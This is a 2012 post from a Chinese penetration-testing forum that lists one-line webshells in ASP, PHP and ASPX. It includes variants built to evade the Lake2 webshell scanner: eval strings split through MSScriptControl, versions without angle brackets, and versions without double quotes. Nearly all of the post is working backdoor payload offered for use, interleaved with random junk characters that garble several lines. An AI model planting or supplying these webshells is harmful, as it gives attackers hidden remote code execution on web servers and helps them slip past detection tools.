中国网络渗透测试联盟

标题: 过雷克图一句话木马 [打印本页]

作者: admin    时间: 2012-9-23 14:36
标题: 过雷克图一句话木马
asp一句话  <%execute(request("1"))%>  7 `: O" A% {. ~! J; a+ q: l; d  E

5 [. R% j' s% `8 x' @; lphp一句话  <?php eval($_POST[1]);?>  
3 ^2 G, Q5 q" ^; d3 d1 D2 K- I8 m# v+ \$ P" r
aspx一句话
8 ~2 x! L! _2 K0 \) F+ v0 J% ^: C0 j+ }% r8 e9 {3 O
<script language="C#" runat="server">3 w, v/ n  j- C$ ~5 `' ^

  ?7 V# S# z8 F/ xWebAdmin2Y.x.y aaaaa = new  WebAdmin2Y.x.y   ("add6bb58e139be10");
! \8 o0 v' V7 Y; r( ], L2 K# {* \
! m$ m9 y5 _& b4 H5 |9 j" g</script>& g3 d7 o4 y' R+ O# F/ G

  C8 T: x  q1 r/ ]可以躲过雷客图的一句话。
) f/ o. Z+ a) P  K( L! G( U2 U  ~+ v* N; ^
  <%
, [6 ~& a% M  m3 _1 ^
! `. ^- X% d8 n6 p: N  set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
& s) I! c7 U+ G. z: B
- M: V# L. s8 t7 T2 u9 e2 N  ms.Language="VBScript"4 b# h3 r  q; c+ K7 a( Z$ R

; o- j# R) H4 E$ |. j" M+ |# k: \( q  ms.AddObject "Response", Response# l) j0 f& T( s

  L6 F) e% u7 F% S* D7 e) f  ms.AddObject "request", request
* j3 k5 o6 e9 z6 \3 I% y$ f
. t: J* S( w( ?6 ?5 n1 Q  ms.ExecuteStatement("ev"&"al(request(""1""))"), z7 Z2 L% G5 Z! m6 T& O3 A

5 C3 h1 S+ {# j  %>7 O: L* z" r. G9 ~
; }; N$ `5 l/ b) S
  不用'<,>'的asp一句话
* w; O$ s. H: s, r; S+ s+ X5 q# F1 O$ s( h# l
  <script language=VBScript runat=server>execute request("1")</script>; q0 }+ [) c! L% X

7 k: p" c. G5 s# e/ k; e" Y  不用双引号的一句话。5 ?- h" L+ m2 s, B

9 q0 C$ X: \! C" B4 s, a  <%eval request(chr(35))%>$ \5 L1 ]  h, I8 V9 M: O6 o: r





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2